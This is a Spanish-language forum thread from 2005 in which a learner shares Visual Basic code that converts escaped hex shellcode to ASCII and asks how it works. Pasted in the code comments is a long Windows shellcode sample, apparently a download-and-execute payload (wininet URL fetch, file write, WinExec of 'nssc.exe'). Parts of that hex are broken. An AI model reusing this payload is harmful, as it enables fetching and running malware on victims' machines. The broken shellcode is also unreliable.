codigo vb para traducir shellcode en hexadecimal a ascii

Iniciado por lumbreras, 23 Octubre 2005, 15:19 PM

0 Miembros y 2 Visitantes están viendo este tema.

lumbreras

Bueno gracias por leer ... aqui viene mi codigo

Private Sub Command1_Click()
On Error Resume Next


    Dim sOriginal As String
    Dim sBuscar As String
    Dim sPoner As String
    Dim sbuf As String
    Dim fbuf As String
    Dim salto As Integer
    Dim contador As Integer
   

    sOriginal = Text2.Text
    sBuscar = "x"
    sPoner = "&H"
    salto = 1



    sbuf = Replace(sOriginal, sBuscar, sPoner, , , vbTextCompare)
   
    sBuscar = "\"
   
    sPoner = ""
   
    Text1.Text = Replace(sbuf, sBuscar, sPoner, , , vbTextCompare)
   
     sBuscar = """"
   
    sPoner = ""
   
    Text1.Text = Replace(Text1.Text, sBuscar, sPoner, , , vbTextCompare)
   
 
   
   
   
    Do Until contador = Len(Text1.Text) / 4
    fbuf = fbuf & Chr(Mid(Text1.Text, salto, 4))
    salto = salto + 4
    contador = contador + 1
    Loop
   
    Text3.Text = fbuf
   
End Sub

'text2.text sera igual en el formulario a
'\xEB\x30\x5F\xFC\x8B\xF7\x80""\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1""\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B""\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40""\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D""\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33""\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80""\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6""\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02""\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03""\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03""\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76""\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06""\x43\x8D
'x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02""\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D""\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC""\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1""\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53""\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9""\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0""\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D""\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B""\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1""\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4""\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0""\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x5
'\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4""\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0""\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75""\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64""\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F""\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F""\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F""\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50""\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49""\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65""\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65""\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65""\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
'lo escribo directamente en el formulario por q no encontre la manera de igualar text2.text con estos parametros sin limpiar primero a mano las "
'solo es un ejemplo de shellcode descargado del web al igual q no consegui q mi programa limpie los (enter) y tengo q quitarlas en un editor de textos a mano antes de copiarlas al text2.text


Mis preguntas son varias ....

- Como puedo hacer para limpiar con mi programa las " y los enter &HD en decimal 13 y en general cualquier caracter ascii q no puedo tipear directamente del teclado o q entra en conflicto en el codigo por usarse dentro del codigo para otros menesteres ...

- Entender basicamente q cojones esta escrito en esta shell code .... mi resultado de traduccion despues de limpiar a mano los enter (aunq las comillas si me las limpia si escribo directamente en el formulario) fue este ...

ë0_ü‹÷€?u€7G€?uò‹æ3Ò²Áâ+‹ì3Ò²Áâ+âTZ²|‹âëëW‰uü3À´@Áà‰Eø‹@<Eø@~‹@Eø‹ø‹ }ø?KERNtƒÀ‹øëëP‹ø3É3À±‹UøRëW‹×€z€t‹2uøƒÆëë~‹}üQó¦Y_t@ƒÇëÛ_‹}øÁàø‹‹]ü[SÿЉEô‹@<Eô‹pxuôv­Eô‰Eð­Eô‰Eì­Eô‰Eè‹Uì‹uüv3Û3ɱ‹:}ôVQó¦Y^tCRëíÑã‹uèó3Éf‹ëë}ÁáMð‹   Mô‰Mä‹]ü[-3ɱ}àSQS‹UôR‹EäüÿÐY[ý«d$ø8+tCëùCâá‹EàSüÿÐý«3ɱ[ üSQS‹UÄR‹EäÿÐY[ý«8+tCëùCâåü3Ò¶ÁâR3ÒR‹EÔÿЉE°3ÒëëwRRRRS‹EÀÿЍ[‰E¬3ÒR¶€ÁâR3ÒRR{   WP‹E¼ÿЉE¨U R3Ò¶ÁâR‹M°QP‹E¸ÿЋM¨Q‹E´ÿЋM¬Q‹E´ÿÐ3ÒRS‹EÜÿЉE¤‹} W‹U°RP‹EØÿЋU¤R‹EÐÿÐëë3ҐRS‹EÌÿÐ3ÒR‹EÈÿÐèæýÿÿGetModuleHandleAkernel32.dllGetProcAddressLoadLibraryA_lcreat_lwriteGlobalAlloc_lcloseWinExecExitProcesswininet.dllInternetOpenAInternetOpenUrlAInternetReadFileInternetCloseHandleNSnssc.exe

Bueno el final parece estar algo claro al menos ay por donde empezar pero todosa esos demas caracteres q ay desde le principioooo , bueno si quiero programarme una debo entenderlo y esq no consigo encontra ay instrucciones de ensamblador ni nada .......
gracias todos por su tiempo

lumbreras

bueno la respuesta a que cojones es el codigo hexadecimal traducido a ascii esta respondida aqui

http://es.wikipedia.org/wiki/Shellcode

aora con q software puedo ejecutar codigo ya compilado a codigo makina para testear las shellcode ?